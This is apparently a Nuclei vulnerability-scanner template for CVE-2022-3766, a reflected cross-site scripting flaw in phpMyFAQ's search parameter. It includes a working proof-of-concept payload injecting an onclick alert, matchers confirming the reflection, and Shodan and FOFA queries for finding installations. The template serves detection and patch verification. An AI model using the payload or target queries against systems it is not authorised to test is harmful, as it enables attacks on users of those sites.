id: CVE-2022-3766

info:
  name: phpMyFAQ < 3.1.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
  impact: |
    An attacker can Execute arbitrary JavaScript in victim's browser context
  remediation: |
    Upgrade phpMyFAQ to version 3.1.8 or later
  reference:
    - https://huntr.dev/bounties/d9666520-4ff5-43bb-aacf-50c8e5570983
    - https://github.com/thorsten/phpMyFAQ/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3766
    cwe-id: CWE-79
    epss-score: 0.2358
    epss-percentile: 0.96082
    cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: phpmyfaq
    product: phpmyfaq
    shodan-query: http.html:"phpmyfaq"
    fofa-query: body="phpmyfaq"
  tags: cve,cve2022,phpmyfaq,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?search=1af%22+onclick%3D'alert(document.domain)'"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "value=\"1af\" onclick='alert(document.domain)'"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2b939612386ee0ab8c2a74fd9d318cbd524b543191ccd88822744c27a4b6b2d02205ce93b46d36a143862b0ee74fe0e5764f190124d14065cbfc8d81dbdd8b70d34:922c64590222798bb761d5b6d8e72950